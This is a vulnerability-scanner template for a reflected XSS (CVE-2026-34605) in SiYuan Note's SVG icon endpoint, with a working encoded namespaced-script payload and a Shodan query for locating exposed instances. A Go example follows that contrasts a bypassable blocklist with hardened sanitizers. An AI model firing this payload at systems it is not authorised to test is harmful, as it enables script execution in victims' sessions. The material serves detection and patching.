id: CVE-2026-34605

info:
  name: SiYuan Note - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    SiYuan Note through version 3.6.1 is vulnerable to unauthenticated reflected Cross-Site Scripting (XSS) in the `/api/icon/getDynamicIcon` endpoint due to improper filtering of SVG elements that carry a namespace prefix (such as the `x:script` element used in the request below). By using a namespaced script element, attackers can bypass the `SanitizeSVG` function and execute arbitrary JavaScript in the victim's browser when the victim visits a crafted link.
  remediation: |
    Upgrade to SiYuan Note version 3.6.2 or later, where the namespace prefix is stripped prior to sanitization, blocking this form of XSS.
  impact: |
    Exploitation allows attackers to execute JavaScript in the context of the SiYuan Note instance, enabling unauthorized access to sensitive data, API calls with the victim's privileges, and potential data extraction or modification, if the victim is an authenticated user.
  reference:
    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-73g7-86qr-jrg3
    - https://nvd.nist.gov/vuln/detail/CVE-2026-34605
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-34605
    epss-score: 0.00139
    epss-percentile: 0.33729
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: siyuan-note
    product: siyuan
    shodan-query: http.favicon.hash:-1450125239
  tags: cve,cve2026,siyuan,xss,svg

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/icon/getDynamicIcon?type=8&color=red&content=%3C%2Ftext%3E%3Cx%3Ascript%20xmlns%3Ax%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3Ealert%28document.domain%29%3C%2Fx%3Ascript%3E%3Ctext%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'alert(document.domain)'
          - 'id="dynamic_icon_type8'
        condition: and

      - type: word
        part: content_type
        words:
          - "image/svg+xml"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f4c14803a54a7feddf46b5ecca9a1167ab5be03640795216ec237caee357b75c022036c98991e7674a907212891c65096b57c5037ed498f069f27d6ce2549de0e6d4:922c64590222798bb761d5b6d8e72950
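The description and remediation above explain the bug in two sentences: a sanitizer that looks for a literal `<script>` tag never sees `<x:script>`, and the fix is to strip the namespace prefix before sanitizing. The Go program below is an added illustration written for this page; it is not SiYuan's `SanitizeSVG` and does not reproduce the 3.6.2 patch. It models three checks over the same input: a naive blocklist that misses the prefixed element, the same blocklist after prefix stripping (the approach the remediation describes), and a tokenizer-based check that compares local element names regardless of prefix and fails closed on unparsable input. The two SVG samples are constructed to resemble the endpoint's response with the template's payload spliced into the `<text>` element; they are not captured output.

```go
package main

import (
	"encoding/xml"
	"fmt"
	"io"
	"regexp"
	"strings"
)

// Constructed sample: an SVG shaped like the endpoint's response, with the
// template's payload (</text><x:script ...>...</x:script><text>) spliced in.
// This is NOT SiYuan's real output.
const MaliciousSVG = `<svg xmlns="http://www.w3.org/2000/svg"><text id="dynamic_icon_type8"></text><x:script xmlns:x="http://www.w3.org/2000/svg">alert(document.domain)</x:script><text></text></svg>`

// Constructed benign icon for comparison.
const BenignSVG = `<svg xmlns="http://www.w3.org/2000/svg"><text id="dynamic_icon_type8">8</text></svg>`

// scriptTag is a blocklist in the style the advisory describes as bypassable:
// it only recognises a literal, unprefixed <script> / </script> tag.
var scriptTag = regexp.MustCompile(`(?i)<\s*/?\s*script\b`)

// NaiveContainsScript reports whether the blocklist fires. A prefixed
// <x:script> never matches, which is the bug.
func NaiveContainsScript(svg string) bool {
	return scriptTag.MatchString(svg)
}

// nsPrefix matches a namespace prefix directly after "<" or "</", e.g. "<x:".
var nsPrefix = regexp.MustCompile(`<(/?)\s*[A-Za-z_][\w.-]*:`)

// StripNamespacePrefix removes element prefixes so <x:script> becomes <script>.
// This mirrors the remediation the advisory describes (strip, then sanitize);
// the exact implementation in SiYuan 3.6.2 is an assumption, not reproduced here.
func StripNamespacePrefix(svg string) string {
	return nsPrefix.ReplaceAllString(svg, "<$1")
}

// HardenedContainsScript runs the same blocklist after prefix stripping.
func HardenedContainsScript(svg string) bool {
	return NaiveContainsScript(StripNamespacePrefix(svg))
}

// ContainsScript is the more robust alternative: tokenize the document and
// compare local element names, so any prefix (or none) is handled, and fail
// closed if the input does not parse.
func ContainsScript(svg string) bool {
	dec := xml.NewDecoder(strings.NewReader(svg))
	dec.Strict = false
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return false
		}
		if err != nil {
			return true // unparsable input is rejected rather than passed through
		}
		se, ok := tok.(xml.StartElement)
		if !ok {
			continue
		}
		// Name.Local is "script" for both <script> and <x:script>.
		if strings.EqualFold(se.Name.Local, "script") {
			return true
		}
		for _, a := range se.Attr {
			// Inline event handlers (onload=, onclick=, ...) are another script vector.
			if strings.HasPrefix(strings.ToLower(a.Name.Local), "on") {
				return true
			}
		}
	}
}

func main() {
	for name, svg := range map[string]string{"malicious": MaliciousSVG, "benign": BenignSVG} {
		fmt.Printf("%-9s naive=%v stripped=%v tokenized=%v\n", name,
			NaiveContainsScript(svg), HardenedContainsScript(svg), ContainsScript(svg))
	}
}
```

Running it shows the malicious sample passing the naive check and being caught by both hardened variants, while the benign icon passes all three. The regex-strip approach is enough for this specific bypass, but a check on parsed local names is the safer default, since it does not depend on a hand-written pattern anticipating every way a prefix can be spelled.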